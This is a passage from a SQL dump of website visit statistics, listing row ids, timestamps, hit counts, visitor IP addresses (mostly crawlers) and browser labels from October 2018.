1,1,0,0,'54.36.149.96','other'),(319121,1539904190,1,1,0,0,'54.36.148.48','other'),(319122,1539904321,1,1,0,0,'54.36.149.89','other'),(319123,1539905173,1,1,0,0,'54.36.148.80','other'),(319124,1539905642,1,1,0,0,'54.36.149.69','other'),(319125,1539905762,1,1,0,0,'54.36.148.18','other'),(319126,1539906139,1,1,0,0,'54.36.149.94','other'),(319127,1539906200,1,1,0,0,'54.36.148.200','other'),(319128,1539906204,1,1,0,0,'54.36.149.90','other'),(319129,1539906577,1,1,0,0,'54.36.148.238','other'),(319130,1539907038,1,1,0,0,'54.36.148.120','other'),(319131,1539907355,1,1,0,0,'54.36.148.54','other'),(319132,1539907506,1,1,0,0,'54.36.148.26','other'),(319133,1539907682,1,1,0,0,'207.46.13.156','other'),(319134,1539907685,1,1,0,0,'54.36.148.174','other'),(319135,1539907878,1,1,0,0,'207.46.13.22','other'),(319136,1539908048,1,1,0,0,'54.36.148.184','other'),(319137,1539908059,1,1,0,0,'54.36.148.107','other'),(319138,1539908575,1,1,0,0,'54.36.148.154','other'),(319139,1539908799,1,1,0,0,'54.36.149.2','other'),(319140,1539908925,1,1,0,0,'54.36.148.124','other'),(319141,1539909370,1,1,0,0,'54.36.149.1','other'),(319142,1539909468,1,1,0,0,'54.36.148.61','other'),(319143,1539910204,1,1,0,0,'54.36.149.98','other'),(319144,1539910577,1,1,0,0,'8.29.198.26','other'),(319145,1539910703,1,1,0,0,'207.46.13.55','other'),(319146,1539910761,1,1,0,0,'8.29.198.27','other'),(319147,1539910908,1,1,0,0,'54.36.148.85','other'),(319148,1539910964,1,1,0,0,'54.36.148.144','other'),(319149,1539911321,2,2,0,0,'178.154.244.11','other'),(319150,1539911330,2,2,0,0,'178.154.244.29','other'),(319151,1539911419,1,1,0,0,'54.36.148.138','other'),(319152,1539911629,1,1,0,0,'54.36.149.65','other'),(319153,1539912032,1,1,0,0,'54.36.148.104','other'),(319154,1539912191,1,1,0,0,'54.36.148.195','other'),(319155,1539912303,1,1,0,0,'54.36.149.2','other'),(319156,1539912450,1,1,0,0,'54.36.149.11','other'),(319157,1539912622,1,1,0,0,'39.104.151.218','other'),(319158,1539912943,1,1,0,0,'54.36.148.137','other'),(319159,1539913321,1,1,0,0,'54.36.149.10','other'),(319160,1539913407,1,1,0,0,'216.244.66.241','other'),(319161,1539913437,1,1,0,0,'54.36.148.28','other'),(319162,1539913608,1,1,0,0,'54.36.148.64','other'),(319163,1539913703,1,1,0,0,'54.36.148.125','other'),(319164,1539914179,1,1,0,0,'54.36.148.52','other'),(319165,1539914260,1,1,0,0,'8.29.198.25','other'),(319166,1539915767,1,1,0,0,'54.36.148.171','other'),(319167,1539916011,1,1,0,0,'216.244.66.241','other'),(319168,1539916065,1,1,0,0,'54.36.148.252','other'),(319169,1539916069,1,1,0,0,'54.36.149.52','other'),(319170,1539916176,1,1,0,0,'54.36.148.238','other'),(319171,1539916210,1,1,0,0,'54.36.149.66','other'),(319172,1539916274,1,1,0,0,'54.36.148.161','other'),(319173,1539916405,20,20,0,0,'95.91.12.84','other'),(319174,1539916496,1,1,0,0,'54.36.148.178','other'),(319175,1539916646,1,1,0,0,'54.36.149.37','other'),(319176,1539917103,1,1,0,0,'54.36.148.255','other'),(319177,1539917839,1,1,0,0,'54.36.148.71','other'),(319178,1539917864,1,1,0,0,'54.36.148.114','other'),(319179,1539917874,1,1,0,0,'54.36.148.118','other'),(319180,1539917894,1,1,0,0,'54.36.148.102','other'),(319181,1539917949,2,2,0,0,'54.36.149.74','other'),(319182,1539918074,1,1,0,0,'46.229.168.143','other'),(319183,1539918147,1,1,0,0,'54.36.148.55','other'),(319184,1539918156,1,1,0,0,'207.46.13.22','other'),(319185,1539918212,1,1,0,0,'95.163.255.94','other'),(319186,1539918215,1,1,0,0,'54.36.148.99','other'),(319187,1539918269,1,1,0,0,'54.36.148.239','other'),(319188,1539918384,1,1,0,0,'95.163.255.92','other'),(319189,1539918411,1,1,0,0,'95.163.255.98','other'),(319190,1539918493,1,1,0,0,'54.36.149.24','other'),(319191,1539918645,1,1,0,0,'54.36.149.90','other'),(319192,1539919239,1,1,0,0,'46.229.168.153','other'),(319193,1539919366,1,1,0,0,'54.36.148.206','other'),(319194,1539919418,1,1,0,0,'54.36.148.35','other'),(319195,1539919695,1,1,0,0,'54.36.148.194','other'),(319196,1539919837,1,1,0,0,'54.36.148.29','other'),(319197,1539919914,1,1,0,0,'94.130.9.183','other'),(319198,1539919933,1,1,0,0,'54.36.148.230','other'),(319199,1539919952,1,1,0,0,'178.154.244.11','other'),(319200,1539921173,1,1,0,0,'207.46.13.55','other'),(319201,1539921410,1,1,0,0,'8.29.198.25','other'),(319202,1539921535,1,1,0,0,'61.154.29.20','other'),(319203,1539921614,1,1,0,0,'8.29.198.26','other'),(319204,1539921637,1,1,0,0,'54.36.148.149','other'),(319205,1539922368,1,1,0,0,'54.36.148.48','other'),(319206,1539922623,1,1,0,0,'54.36.149.105','other'),(319207,1539923078,1,1,0,0,'178.140.229.88','firefox'),(319208,1539923086,1,1,0,0,'54.36.148.125','other'),(319209,1539923225,1,1,0,0,'54.36.149.96','other'),(319210,1539923279,1,1,0,0,'54.36.148.74','other'),(319211,1539923632,1,1,0,0,'54.36.149.2','other'),(319212,1539923789,1,1,0,0,'54.36.148.110','other'),(319213,1539923837,1,1,0,0,'54.36.148.213','other'),(319214,1539924444,1,1,0,0,'54.36.149.75','other'),(319215,1539925087,1,1,0,0,'8.29.198.26','other'),(319216,1539925260,1,1,0,0,'54.36.148.219','other'),(319217,1539925277,1,1,0,0,'54.36.148.112','other'),(319218,1539925403,1,1,0,0,'54.36.148.90','other'),(319219,1539925560,1,1,0,0,'54.36.148.156','other'),(319220,1539925727,1,1,0,0,'54.36.148.27','other'),(319221,1539925776,1,1,0,0,'54.36.148.240','other'),(319222,1539925894,1,1,0,0,'54.36.148.232','other'),(319223,1539926003,1,1,0,0,'54.36.148.182','other'),(319224,1539926363,1,1,0,0,'54.36.149.106','other'),(319225,1539926372,1,1,0,0,'54.36.148.149','other'),(319226,1539927011,1,1,0,0,'54.36.148.61','other'),(319227,1539927140,1,1,0,0,'54.36.149.48','other'),(319228,1539927407,1,1,0,0,'178.154.244.29','other'),(319229,1539927725,1,1,0,0,'193.105.62.60','chrome'),(319230,1539927992,1,1,0,0,'54.36.148.148','other'),(319231,1539928047,1,1,0,0,'193.106.30.98','firefox'),(319232,1539928330,1,1,0,0,'54.36.148.137','other'),(319233,1539928488,1,1,0,0,'66.249.66.156','chrome'),(319234,1539928690,1,1,0,0,'54.36.148.42','other'),(319235,1539928700,1,1,0,0,'54.36.148.190','other'),(319236,1539929153,1,1,0,0,'54.36.148.116','other'),(319237,1539929412,1,1,0,0,'66.249.66.155','chrome'),(319238,1539929429,1,1,0,0,'54.36.148.223','other'),(319239,1539929582,1,1,0,0,'54.36.149.30','other'),(319240,1539929702,1,1,0,0,'54.36.148.72','other'),(319241,1539930122,2,2,0,0,'54.36.149.106','other'),(319242,1539930124,1,1,0,0,'54.36.148.31','other'),(319243,1539930171,1,1,0,0,'54.36.148.167','other'),(319244,1539930189,1,1,0,0,'54.36.149.1','other'),(319245,1539930422,1,1,0,0,'46.229.168.138','other'),(319246,1539930641,1,1,0,0,'91.196.178.131','chrome'),(319247,1539930818,1,1,0,0,'216.244.66.241','other'),(319248,1539930839,1,1,0,0,'180.76.15.140','other'),(319249,1539930988,1,1,0,0,'54.36.149.42','other'),(319250,1539931143,1,1,0,0,'46.229.168.130','other'),(319251,1539932031,5,5,0,0,'5.9.154.69','other'),(319252,1539932240,2,2,0,0,'8.29.198.25','other'),(319253,1539933135,1,1,0,0,'54.36.149.11','other'),(319254,1539933491,1,1,0,0,'46.229.168.151','other'),(319255,1539933721,1,1,0,0,'54.36.148.210','other'),(319256,1539933852,1,1,0,0,'130.180.218.157','chrome'),(319257,1539933995,1,1,0,0,'216.244.66.241','other'),(319258,1539934109,1,1,0,0,'95.163.255.93','other'),(319259,1539934229,1,1,0,0,'54.36.148.88','other'),(319260,1539934466,1,1,0,0,'54.36.149.3','other'),(319261,1539934554,1,1,0,0,'54.36.149.22','other'),(319262,1539934652,1,1,0,0,'46.229.168.144','other'),(319263,1539934655,1,1,0,0,'47.93.216.46','firefox'),(319264,1539934719,1,1,0,0,'54.36.149.57','other'),(319265,1539934790,1,1,0,0,'47.95.241.100','firefox'),(319266,1539934798,1,1,0,0,'54.36.148.89','other'),(319267,1539935063,1,1,0,0,'54.36.148.168','other'),(319268,1539935600,1,1,0,0,'46.211.41.148','chrome'),(319269,1539935634,2,2,0,0,'216.244.66.241','other'),(319270,1539935716,1,1,0,0,'54.36.148.130','other'),(319271,1539935729,1,1,0,0,'176.193.235.195','chrome'),(319272,1539935917,1,1,0,0,'8.29.198.26','other'),(319273,1539936689,1,1,0,0,'54.36.148.105','other'),(319274,1539937027,1,1,0,0,'195.34.207.31','chrome'),(319275,1539937066,1,1,0,0,'66.249.66.61','chrome'),(319276,1539937185,1,1,0,0,'54.36.148.82','other'),(319277,1539937382,1,1,0,0,'91.196.178.162','chrome'),(319278,1539937464,1,1,0,0,'91.196.178.82','chrome'),(319279,1539937624,1,1,0,0,'94.179.190.67','chrome'),(319280,1539938459,33,33,0,0,'193.200.241.230','other'),(319281,1539938580,1,1,0,0,'207.46.13.22','other'),(319282,1539938719,1,1,0,0,'54.36.148.226','other'),(319283,1539938781,1,1,0,0,'54.36.149.50','other'),(319284,1539939438,1,1,0,0,'54.36.148.185','other'),(319285,1539939551,1,1,0,0,'207.46.13.16','other'),(319286,1539940116,1,1,0,0,'216.244.66.241','other'),(319287,1539940334,1,1,0,0,'66.249.66.156','chrome'),(319288,1539940470,1,1,0,0,'46.229.168.148','other'),(319289,1539940511,1,1,0,0,'54.36.148.189','other'),(319290,1539941232,1,1,0,0,'178.95.67.148','chrome'),(319291,1539941356,2,2,0,0,'91.196.178.169','chrome'),(319292,1539941402,1,1,0,0,'54.36.148.88','other'),(319293,1539941773,1,1,0,0,'54.36.148.216','other'),(319294,1539941856,1,1,0,0,'54.36.148.254','other'),(319295,1539942316,1,1,0,0,'54.36.148.178','other'),(319296,1539942739,1,1,0,0,'54.36.149.52','other'),(319297,1539942773,1,1,0,0,'54.36.149.103','other'),(319298,1539942779,1,1,0,0,'216.244.66.241','other'),(319299,1539943070,1,1,0,0,'8.29.198.27','other'),(319300,1539943196,1,1,0,0,'66.249.66.155','chrome'),(319301,1539943270,1,1,0,0,'180.76.15.143','other'),(319302,1539943310,1,1,0,0,'8.29.198.25','other'),(319303,1539943326,1,1,0,0,'95.132.32.27','firefox'),(319304,1539943590,1,1,0,0,'46.133.246.55','chrome'),(319305,1539943966,1,1,0,0,'54.36.148.169','other'),(319306,1539944077,1,1,0,0,'54.36.148.107','other'),(319307,1539944199,1,1,0,0,'54.36.148.217','other'),(319308,1539944202,1,1,0,0,'216.244.66.241','other'),(319309,1539944435,1,1,0,0,'54.36.149.49','other'),(319310,1539944767,1,1,0,0,'54.36.148.88','other'),(319311,1539945143,1,1,0,0,'54.36.148.31','other'),(319312,1539945891,1,1,0,0,'54.36.149.71','other'),(319313,1539945926,1,1,0,0,'66.249.66.156','chrome'),(319314,1539946393,1,1,0,0,'54.36.148.185','other'),(319315,1539946400,1,1,0,0,'54.36.148.113','other'),(319316,1539946446,1,1,0,0,'54.36.148.204','other'),(319317,1539946748,1,1,0,0,'8.29.198.26','other'),(319318,1539946858,1,1,0,0,'54.36.148.140','other'),(319319,1539947085,1,1,0,0,'54.36.148.240','other'),(319320,1539948247,1,1,0,0,'91.196.178.89','chrome'),(319321,1539948819,1,1,0,0,'54.36.149.103','other'),(319322,1539949075,1,1,0,0,'46.229.168.141','other'),(319323,1539949712,1,1,0,0,'193.0.219.109','chrome'),(319324,1539949736,1,1,0,0,'46.229.168.146','other'),(319325,1539949872,1,1,0,0,'54.36.148.126','other'),(319326,1539950020,1,1,0,0,'54.36.148.100','other'),(319327,1539950213,1,1,0,0,'54.36.148.227','other'),(319328,1539950833,1,1,0,0,'54.36.148.219','other'),(319329,1539950850,2,2,0,0,'5.83.23.13','chrome'),(319330,1539951065,1,1,0,0,'78.154.171.198','chrome'),(319331,1539951084,1,1,0,0,'54.36.148.179','other'),(319332,1539951128,1,1,0,0,'91.211.135.105','chrome'),(319333,1539951231,1,1,0,0,'92.112.16.229','chrome'),(319334,1539951418,1,0,1,0,'66.249.66.157',''),(319335,1539951556,1,1,0,0,'54.36.148.162','other'),(319336,1539951674,1,1,0,0,'54.36.148.154','other'),(319337,1539951925,3,3,0,0,'216.244.66.241','other'),(319338,1539951930,1,1,0,0,'46.229.168.137','other'),(319339,1539951964,1,1,0,0,'178.154.244.11','other'),(319340,1539951965,1,1,0,0,'178.154.244.29','other'),(319341,1539951971,1,1,0,0,'95.216.6.46','other'),(319342,1539952067,1,1,0,0,'54.36.149.21','other'),(319343,1539952523,1,1,0,0,'46.229.168.153','other'),(319344,1539952804,1,1,0,0,'91.196.178.89','chrome'),(319345,1539952891,1,1,0,0,'54.36.149.35','other'),(319346,1539952895,1,1,0,0,'54.36.148.75','other'),(319347,1539952972,2,2,0,0,'91.196.178.68','firefox'),(319348,1539953011,1,1,0,0,'54.36.148.194','other'),(319349,1539953121,1,1,0,0,'54.36.148.175','other'),(319350,1539953275,1,1,0,0,'54.36.148.146','other'),(319351,1539953306,1,1,0,0,'54.36.148.123','other'),(319352,1539953333,1,1,0,0,'54.36.149.50','other'),(319353,1539953416,1,1,0,0,'54.36.149.37','other'),(319354,1539953610,1,1,0,0,'66.249.66.156','chrome'),(319355,1539953655,1,1,0,0,'91.196.178.84','firefox'),(319356,1539953871,1,1,0,0,'207.46.13.55','other'),(319357,1539953898,1,1,0,0,'8.29.198.25','other'),(319358,1539954012,1,1,0,0,'54.36.148.223','other'),(319359,1539954164,1,1,0,0,'54.36.149.72','other'),(319360,1539954172,1,1,0,0,'8.29.198.26','other'),(319361,1539954616,1,1,0,0,'54.36.148.86','other'),(319362,1539954966,1,1,0,0,'54.36.148.31','other'),(319363,1539954988,1,1,0,0,'54.36.148.121','other'),(319364,1539955279,1,1,0,0,'54.36.148.106','other'),(319365,1539956106,1,1,0,0,'54.36.149.32','other'),(319366,1539956307,1,1,0,0,'54.36.148.224','other'),(319367,1539956714,1,1,0,0,'54.36.148.127','other'),(319368,1539956811,1,1,0,0,'54.36.149.35','other'),(319369,1539957424,1,0,1,0,'66.249.66.57',''),(319370,1539957572,1,1,0,0,'8.29.198.26','other'),(319371,1539958054,1,1,0,0,'46.229.168.145','other'),(319372,1539958954,1,1,0,0,'207.46.13.55','other'),(319373,1539958961,1,1,0,0,'216.244.66.241','other'),(319374,1539961596,2,2,0,0,'178.154.244.29','other'),(319375,1539962094,2,2,0,0,'5.45.207.79','other'),(319376,1539962454,1,1,0,0,'91.196.178.168','chrome'),(319377,1539962773,1,1,0,0,'66.249.66.155','chrome'),(319378,1539962892,1,1,0,0,'39.104.156.69','other'),(319379,1539963263,1,1,0,0,'216.244.66.241','other'),(319380,1539963362,1,1,0,0,'178.154.244.11','other'),(319381,1539964721,2,2,0,0,'8.29.198.27','other'),(319382,1539965243,2,2,0,0,'178.154.244.11','other'),(319383,1539965790,1,1,0,0,'216.244.66.241','other'),(319384,1539966547,1,1,0,0,'207.46.13.22','other'),(319385,1539967440,1,1,0,0,'66.249.66.156','chrome'),(319386,1539967496,1,1,0,0,'188.230.43.254','other'),(319387,1539968404,1,1,0,0,'8.29.198.26','other'),(319388,1539969180,2,2,0,0,'216.244.66.241','other'),(319389,1539969359,1,1,0,0,'66.249.66.157','chrome'),(319390,1539969718,1,1,0,0,'37.115.184.19','chrome'),(319391,1539969895,1,1,0,0,'188.230.43.254','other'),(319392,1539971479,1,1,0,0,'178.154.244.29','other'),(319393,1539971887,1,1,0,0,'66.249.66.156','chrome'),(319394,1539972006,1,1,0,0,'95.132.134.138','chrome'),(319395,1539972699,1,1,0,0,'216.244.66.241','other'),(319396,1539972719,1,1,0,0,'66.249.66.157','chrome'),(319397,1539972800,1,1,0,0,'37.54.23.36','chrome'),(319398,1539973183,1,1,0,0,'46.229.168.129','other'),(319399,1539973381,1,1,0,0,'178.154.244.11','other'),(319400,1539973439,1,1,0,0,'66.249.66.156','chrome'),(319401,1539974293,1,1,0,0,'46.229.168.150','other'),(319402,1539974427,1,1,0,0,'207.46.13.22','other'),(319403,1539974701,1,1,0,0,'178.154.244.29','other'),(319404,1539975555,2,2,0,0,'8.29.198.26','other'),(319405,1539976241,1,1,0,0,'91.196.178.99','chrome'),(319406,1539976544,1,1,0,0,'178.154.244.29','other'),(319407,1539977690,4,1,3,0,'66.249.66.155',''),(319408,1539977912,1,1,0,0,'66.102.9.40','chrome'),(319409,1539977914,1,1,0,0,'66.102.9.38','chrome'),(319410,1539978098,1,0,1,0,'66.249.66.156',''),(319411,1539978372,1,1,0,0,'180.76.15.27','other'),(319412,1539978621,1,1,0,0,'178.154.244.11','other'),(319413,1539978870,2,2,0,0,'216.244.66.241','other'),(319414,1539979246,1,1,0,0,'8.29.198.26','other'),(319415,1539980293,2,2,0,0,'216.244.66.241','other'),(319416,1539980372,1,1,0,0,'180.76.15.33','other'),(319417,1539981637,1,1,0,0,'66.249.66.156','chrome'),(319418,1539981905,1,1,0,0,'163.172.4.153','chrome'),(319419,1539982373,1,1,0,0,'180.76.15.33','other'),(319420,1539984714,1,1,0,0,'5.45.207.19','other'),(319421,1539984726,1,1,0,0,'95.163.255.94','other'),(319422,1539985844,1,1,0,0,'46.229.168.130','other'),(319423,1539986042,1,1,0,0,'178.154.244.11','other'),(319424,1539986386,2,2,0,0,'8.29.198.25','other'),(319425,1539986561,1,1,0,0,'207.46.13.55','other'),(319426,1539987125,1,1,0,0,'46.229.168.144','other'),(319427,1539987806,1,1,0,0,'95.163.255.94','other'),(319428,1539988784,1,1,0,0,'45.40.127.111','chrome'),(319429,1539990083,1,1,0,0,'8.29.198.27','other'),(319430,1539990245,1,1,0,0,'95.163.255.97','other'),(319431,1539990967,1,1,0,0,'46.229.168.140','other'),(319432,1539992187,1,1,0,0,'178.154.244.29','other'),(319433,1539993742,1,1,0,0,'207.46.13.55','other'),(319434,1539993930,1,1,0,0,'66.249.66.155','chrome'),(319435,1539994410,1,1,0,0,'180.76.15.31','other'),(319436,1539994517,1,1,0,0,'46.229.168.129','other'),(319437,1539994840,1,1,0,0,'66.249.66.155','chrome'),(319438,1539994980,1,1,0,0,'207.46.13.55','other'),(319439,1539995326,2,2,0,0,'207.46.13.22','other'),(319440,1539996119,1,1,0,0,'207.46.13.16','other'),(319441,1539996820,1,1,0,0,'5.45.207.79','other'),(319442,1539997224,2,2,0,0,'8.29.198.25','other'),(319443,1539998445,1,1,0,0,'216.244.66.241','other'),(319444,1540000921,1,1,0,0,'8.29.198.25','other'),(319445,1540002402,1,1,0,0,'66.249.66.156','chrome'),(319446,1540002992,1,1,0,0,'46.229.168.135','other'),(319447,1540003552,1,1,0,0,'66.249.66.155','chrome'),(319448,1540004494,1,1,0,0,'207.46.13.22','other'),(319449,1540005532,1,1,0,0,'46.229.168.145','other'),(319450,1540006033,3,2,1,0,'66.249.66.156',''),(319451,1540006193,2,1,1,0,'66.249.66.157',''),(319452,1540006365,1,1,0,0,'46.229.168.140','other'),(319453,1540006658,1,1,0,0,'66.249.66.156','chrome'),(319454,1540006897,1,1,0,0,'66.249.66.59','chrome'),(319455,1540007025,1,1,0,0,'66.249.66.155','chrome'),(319456,1540008055,1,1,0,0,'8.29.198.26','other'),(319457,1540008127,1,1,0,0,'46.229.168.138','other'),(319458,1540008140,1,1,0,0,'216.244.66.241','other'),(319459,1540008184,1,1,0,0,'178.154.244.29','other'),(319460,1540008437,1,1,0,0,'8.29.198.27','other'),(319461,1540009213,1,1,0,0,'5.45.207.19','other'),(319462,1540009845,1,1,0,0,'46.229.168.144','other'),(319463,1540010412,1,1,0,0,'66.249.66.156','chrome'),(319464,1540010534,1,1,0,0,'207.46.13.55','other'),(319465,1540010868,1,1,0,0,'207.46.13.16','other'),(319466,1540010971,1,1,0,0,'46.229.168.129','other'),(319467,1540010992,1,1,0,0,'178.154.244.29','other'),(319468,1540011365,2,2,0,0,'95.213.141.126','opera'),(319469,1540011754,1,1,0,0,'8.29.198.25','other'),(319470,1540012070,1,1,0,0,'178.154.244.29','other'),(319471,1540012600,1,1,0,0,'207.46.13.22','other'),(319472,1540013012,1,1,0,0,'5.45.207.79','other'),(319473,1540013181,1,1,0,0,'178.154.244.29','other'),(319474,1540013182,1,1,0,0,'66.249.66.157','chrome'),(319475,1540013573,1,1,0,0,'54.93.194.5','other'),(319476,1540014017,1,1,0,0,'66.249.66.59','chrome'),(319477,1540014135,1,1,0,0,'66.249.66.156','chrome'),(319478,1540014596,1,1,0,0,'66.249.66.155','chrome'),(319479,1540014991,1,1,0,0,'46.229.168.145','other'),(319480,1540016304,2,2,0,0,'216.244.66.241','other'),(319481,1540016387,1,1,0,0,'46.229.168.133','other'),(319482,1540016887,4,4,0,0,'178.154.244.29','other'),(319483,1540016902,2,2,0,0,'178.154.244.11','other'),(319484,1540016995,1,1,0,0,'91.196.178.167','chrome'),(319485,1540017099,1,1,0,0,'95.163.255.93','other'),(319486,1540017635,1,1,0,0,'66.249.66.156','chrome'),(319487,1540017924,1,1,0,0,'37.115.121.126','chrome'),(319488,1540018535,1,1,0,0,'66.249.66.57','chrome'),(319489,1540018598,1,1,0,0,'91.196.178.167','chrome'),(319490,1540018665,1,1,0,0,'66.249.66.157','chrome'),(319491,1540018877,1,1,0,0,'8.29.198.25','other'),(319492,1540018957,1,1,0,0,'178.154.244.29','other'),(319493,1540019276,1,1,0,0,'8.29.198.26','other'),(319494,1540020046,1,1,0,0,'66.249.66.61','chrome'),(319495,1540020251,1,1,0,0,'66.249.66.155','chrome'),(319496,1540022577,1,1,0,0,'8.29.198.26','other'),(319497,1540023245,1,1,0,0,'66.249.66.155','chrome'),(319498,1540023864,2,1,1,0,'66.249.66.156',''),(319499,1540024229,1,1,0,0,'46.229.168.135','other'),(319500,1540024605,1,1,0,0,'66.249.66.156','chrome'),(319501,1540025212,1,1,0,0,'66.249.66.157','chrome'),(319502,1540025832,1,1,0,0,'66.249.66.156','chrome'),(319503,1540027678,2,2,0,0,'66.249.66.156','chrome'),(319504,1540027714,1,1,0,0,'207.46.13.22','other'),(319505,1540028355,1,1,0,0,'216.244.66.241','other'),(319506,1540028725,1,1,0,0,'66.249.66.157','chrome'),(319507,1540029544,1,1,0,0,'207.46.13.22','other'),(319508,1540029694,1,1,0,0,'8.29.198.26','other'),(319509,1540029789,3,3,0,0,'66.249.66.155','chrome'),(319510,1540030116,1,1,0,0,'8.29.198.27','other'),(319511,1540030818,1,1,0,0,'46.229.168.149','other'),(319512,1540031380,1,1,0,0,'66.249.66.157','chrome'),(319513,1540031401,1,1,0,0,'66.249.66.155','chrome'),(319514,1540031419,1,1,0,0,'66.249.66.57','chrome'),(319515,1540031463,1,1,0,0,'216.244.66.241','other'),(319516,1540031744,1,1,0,0,'145.239.88.66','chrome'),(319517,1540033271,1,1,0,0,'66.249.66.157','chrome'),(319518,1540033294,1,1,0,0,'66.249.66.156','chrome'),(319519,1540033411,1,1,0,0,'8.29.198.25','other'),(319520,1540034148,1,1,0,0,'46.229.168.146','other'),(319521,1540034244,1,1,0,0,'66.249.66.156','chrome'),(319522,1540035616,1,1,0,0,'158.69.116.77','other'),(319523,1540035649,1,1,0,0,'158.69.116.77','chrome'),(319524,1540035960,2,2,0,0,'66.249.66.155','chrome'),(319525,1540036685,1,1,0,0,'46.229.168.133','other'),(319526,1540038649,1,1,0,0,'66.249.66.155','chrome'),(319527,1540038683,1,1,0,0,'66.249.66.157','chrome'),(319528,1540039490,1,1,0,0,'216.244.66.241','other'),(319529,1540040514,1,1,0,0,'8.29.198.26','other'),(319530,1540040577,1,1,0,0,'66.249.66.155','chrome'),(319531,1540040603,3,3,0,0,'207.46.13.22','other'),(319532,1540040666,1,1,0,0,'46.229.168.151','other'),(319533,1540040953,1,1,0,0,'8.29.198.27','other'),(319534,1540041269,1,1,0,0,'46.229.168.154','other'),(319535,1540042008,1,1,0,0,'46.229.168.153','other'),(319536,1540044234,1,1,0,0,'8.29.198.27','other'),(319537,1540045345,1,1,0,0,'46.229.168.144','other'),(319538,1540045634,1,1,0,0,'52.53.201.78','chrome'),(319539,1540045811,1,1,0,0,'46.229.168.141','other'),(319540,1540045953,1,1,0,0,'180.76.15.161','other'),(319541,1540046884,1,1,0,0,'216.244.66.241','other'),(319542,1540047292,2,2,0,0,'66.249.66.155','chrome'),(319543,1540047671,1,1,0,0,'87.250.224.64','other'),(319544,1540047911,2,2,0,0,'66.249.66.156','chrome'),(319545,1540048298,2,2,0,0,'207.46.13.55','other'),(319546,1540048733,1,1,0,0,'91.209.11.236','other'),(319547,1540049875,1,1,0,0,'18.196.18.95','other'),(319548,1540049953,1,1,0,0,'180.76.15.20','other'),(319549,1540050339,1,1,0,0,'91.209.11.236','other'),(319550,1540050566,1,1,0,0,'91.196.178.101','chrome'),(319551,1540051252,1,1,0,0,'37.54.23.36','chrome'),(319552,1540051339,1,1,0,0,'8.29.198.26','other'),(319553,1540051783,1,1,0,0,'8.29.198.27','other'),(319554,1540051828,1,1,0,0,'66.249.66.157','chrome'),(319555,1540052458,1,1,0,0,'46.229.168.151','other'),(319556,1540052583,1,1,0,0,'207.46.13.55','other'),(319557,1540052789,1,1,0,0,'46.229.168.134','other'),(319558,1540053354,1,1,0,0,'66.249.66.157','chrome'),(319559,1540053693,1,1,0,0,'66.249.66.156','chrome'),(319560,1540053894,1,1,0,0,'66.249.66.61','chrome'),(319561,1540054075,1,1,0,0,'66.249.66.59','chrome'),(319562,1540054994,1,1,0,0,'66.249.66.57','chrome'),(319563,1540055063,1,1,0,0,'8.29.198.26','other'),(319564,1540056415,3,3,0,0,'216.244.66.241','other'),(319565,1540056594,1,1,0,0,'66.249.66.156','chrome'),(319566,1540056830,6,6,0,0,'66.249.66.155','chrome'),(319567,1540056963,1,1,0,0,'66.249.66.157','chrome'),(319568,1540057889,1,1,0,0,'5.188.210.11','chrome'),(319569,1540057912,1,1,0,0,'95.163.255.97','other'),(319570,1540058012,4,4,0,0,'66.249.66.156','chrome'),(319571,1540058882,2,2,0,0,'66.249.66.155','chrome'),(319572,1540059337,1,1,0,0,'46.229.168.152','other'),(319573,1540059697,1,1,0,0,'46.229.168.141','other'),(319574,1540059818,2,2,0,0,'216.244.66.241','other'),(319575,1540060502,1,1,0,0,'5.45.207.79','other'),(319576,1540060532,1,1,0,0,'213.180.203.61','other'),(319577,1540060708,2,2,0,0,'66.249.66.155','chrome'),(319578,1540060903,3,3,0,0,'91.242.162.53','other'),(319579,1540062175,1,1,0,0,'8.29.198.27','other'),(319580,1540062520,1,1,0,0,'141.8.142.144','other'),(319581,1540062547,1,1,0,0,'95.108.181.94','other'),(319582,1540062565,2,2,0,0,'66.249.66.157','chrome'),(319583,1540062595,1,1,0,0,'178.154.171.30','other'),(319584,1540062625,1,1,0,0,'8.29.198.25','other'),(319585,1540062849,1,1,0,0,'87.250.224.99','other'),(319586,1540062874,1,1,0,0,'46.229.168.133','other'),(319587,1540063231,2,2,0,0,'5.45.207.79','other'),(319588,1540063308,3,3,0,0,'91.242.162.53','other'),(319589,1540063912,1,0,1,0,'66.249.66.155',''),(319590,1540063917,1,0,1,0,'66.249.66.156',''),(319591,1540064069,1,1,0,0,'141.8.142.38','other'),(319592,1540064144,1,1,0,0,'95.163.255.99','other'),(319593,1540064342,1,1,0,0,'91.242.162.53','other'),(319594,1540064356,1,1,0,0,'178.154.200.8','other'),(319595,1540064359,1,1,0,0,'66.249.66.156','chrome'),(319596,1540064467,1,1,0,0,'207.46.13.22','other'),(319597,1540065328,1,1,0,0,'95.163.255.93','other'),(319598,1540065345,2,2,0,0,'66.249.66.155','chrome'),(319599,1540065349,1,1,0,0,'66.249.66.156','chrome'),(319600,1540065357,1,1,0,0,'207.46.13.55','other'),(319601,1540065799,1,1,0,0,'46.229.168.154','other'),(319602,1540065887,1,1,0,0,'8.29.198.26','other'),(319603,1540066275,1,1,0,0,'213.180.203.53','other'),(319604,1540066619,1,1,0,0,'178.154.200.8','other'),(319605,1540066879,1,1,0,0,'95.108.213.50','other'),(319606,1540067175,1,1,0,0,'141.8.142.144','other'),(319607,1540067195,1,1,0,0,'5.45.207.79','other'),(319608,1540067427,1,1,0,0,'207.46.13.55','other'),(319609,1540067574,1,1,0,0,'91.242.162.53','other'),(319610,1540067696,2,2,0,0,'66.249.66.156','chrome'),(319611,1540067797,1,1,0,0,'66.249.66.157','chrome'),(319612,1540067861,2,2,0,0,'66.249.66.155','chrome'),(319613,1540068241,1,1,0,0,'178.154.171.30','other'),(319614,1540068983,1,1,0,0,'207.46.13.22','other'),(319615,1540069057,1,1,0,0,'178.154.244.11','other'),(319616,1540069182,1,1,0,0,'66.249.66.155','chrome'),(319617,1540069183,4,4,0,0,'66.249.66.157','chrome'),(319618,1540069214,1,1,0,0,'141.8.183.23','other'),(319619,1540069216,2,2,0,0,'66.249.66.156','chrome'),(319620,1540069426,1,1,0,0,'91.242.162.53','other'),(319621,1540070127,2,2,0,0,'66.249.66.155','chrome'),(319622,1540070789,1,1,0,0,'5.45.207.19','other'),(319623,1540070791,1,1,0,0,'141.8.142.81','other'),(319624,1540070954,2,2,0,0,'91.242.162.53','other'),(319625,1540070997,1,1,0,0,'95.163.255.94','other'),(319626,1540071595,1,1,0,0,'46.118.197.19','chrome'),(319627,1540071646,4,4,0,0,'66.249.66.155','chrome'),(319628,1540071894,2,2,0,0,'91.242.162.53','other'),(319629,1540072519,1,1,0,0,'